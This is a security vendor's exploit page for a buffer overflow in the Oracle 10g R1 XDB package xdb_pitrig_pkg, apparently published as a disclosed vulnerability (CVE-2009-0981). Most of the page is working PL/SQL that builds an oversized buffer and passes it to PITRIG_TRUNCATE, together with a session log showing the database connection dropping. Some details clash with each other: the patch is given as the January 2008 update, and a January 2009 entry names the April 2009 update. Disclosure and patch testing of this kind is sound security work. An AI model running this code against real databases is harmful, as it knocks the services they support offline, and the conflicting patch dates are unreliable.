Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)

Name Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)
Systems Affected
Severity High Risk
Category Denial of Service
Vendor URL http://www.oracle.com/
Credit Alexandr Polyakov
Exploit http://dsecrg.com/pages/vul/show.php?id=19
Date 28 Jan 2009

Details

This exploit causes the database to crash

Example
set serveroutput on
declare
buff varchar2(32767);
begin
/* generate evil buffer */
buff:='12345678901234567890123456789';
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||'0012345678901234567890123sh2kerr';
/* lets see the buffer size */
dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;

/************************************************ POC ****************************/
Exploitation Log:
Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>
SQL> set serveroutput on
SQL> declare
2 buff varchar2(32767);
3 begin
4 /* generate evil buffer */
5 buff:='12345678901234567890123456789';
6 buff:=buff||buff;
7 buff:=buff||buff;
8 buff:=buff||buff;
9 buff:=buff||buff;
10 buff:=buff||buff;
11 buff:=buff||'0012345678901234567890123sh2ker';
12 /* lets see the buffer size */
13 dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
14 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
15 end;
16 /
SEND EVIL BUFFER SIZE:959
declare
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-00972: identifier is too long
ORA-06512: at "XDB.XDB_PITRIG_PKG", line 26
ORA-06512: at "XDB.XDB_PITRIG_PKG", line 36
ORA-06512: at line 14


SQL> set serveroutput on
SQL> declare
2 buff varchar2(32767);
3 begin
4 /* generate evil buffer */
5 buff:='12345678901234567890123456789';
6 buff:=buff||buff;
7 buff:=buff||buff;
8 buff:=buff||buff;
9 buff:=buff||buff;
10 buff:=buff||buff;
11 buff:=buff||'0012345678901234567890123sh2kerr';
12 /* lets see the buffer size */
13 dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
14 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
15 end;
16 /
ERROR:
ORA-03114: not connected to ORACLE

declare
*
ERROR at line 1:
ORA-03135: connection lost contact


Patch Information
Apply the latest Oracle Security patches (e.g. CPU Jan 2008 )


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published



2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.